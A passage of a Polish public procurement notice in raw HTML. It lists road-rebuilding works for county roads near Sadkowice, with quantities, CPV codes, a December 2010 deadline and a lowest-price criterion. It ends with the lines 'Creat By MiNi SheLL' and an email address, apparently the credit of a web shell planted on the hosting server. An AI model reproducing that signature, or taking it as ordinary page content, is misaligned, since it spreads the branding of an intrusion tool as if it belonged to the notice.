warstwa dolna gr. 20 cm  - 8505 m2 14. Wykonanie podbudowy z kruszywa naturalnego, warstwa górna  gr. 8 cm  - 8505 m2 V. Nawierzchnie 15. Wykonanie warstwy wiążącej z mieszanki mineralno-asfaltowej dla ruchu KR ?, gr. 4 cm, szer.4,10 m - 8302 m2 16. Mechaniczne wykonanie warstwy ścieralnej gr. 3 cm z masy mineralno-asfaltowej dla ruchu KR-1/2,  szer. 4,00 m - 8100 m2 VI. Roboty wykończeniowe i towarzyszące 17.Wzmocnienie poboczy materiałem kamiennym grubość warstwy do 10 cm, szer. 0,50 m - 2025 m2  18. Uzupełnianie i wyprofilowanie poboczy gruntowych do 10 cm szer. 0, 50 m - 2025  m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.26.00-1, 45.23.31.00-0, 45.23.31.00-2, 45.23.31.40-2, 45.23.31.42-6, 45.23.33.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odbudowa (modernizacja) drogi powiatowej nr 1933W Sadkowice - Kępa Piotrawińska - Pawłowice w km 0+020 - 7+170, dł. 7,150 km.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót: I. Roboty przygotowawcze 1. Rozbieranie nawierzchni z mas mineralno - bitumicznych gr. warstwy 4cm - 225,0 m2 2. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym - 7,150 km II. Podbudowy  3. Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno-asfaltową w ilości śr. 50 kg/m2 (śr. gr. 2 cm) - 1608 ton 4. Mechaniczne wykonanie warstwy ścieralnej gr. 4 cm   z masy mineralno-asfaltowej dla ruchu KR-1/2 - 32395,0 m2 IV Roboty wykończeniowe i towarzyszące 5. Uzupełnianie i wyprofilowanie poboczy gruntowych do 10 cm szer. 1, 25 m - 17875,0 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.31.00-0, 45.23.31.40-2, 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com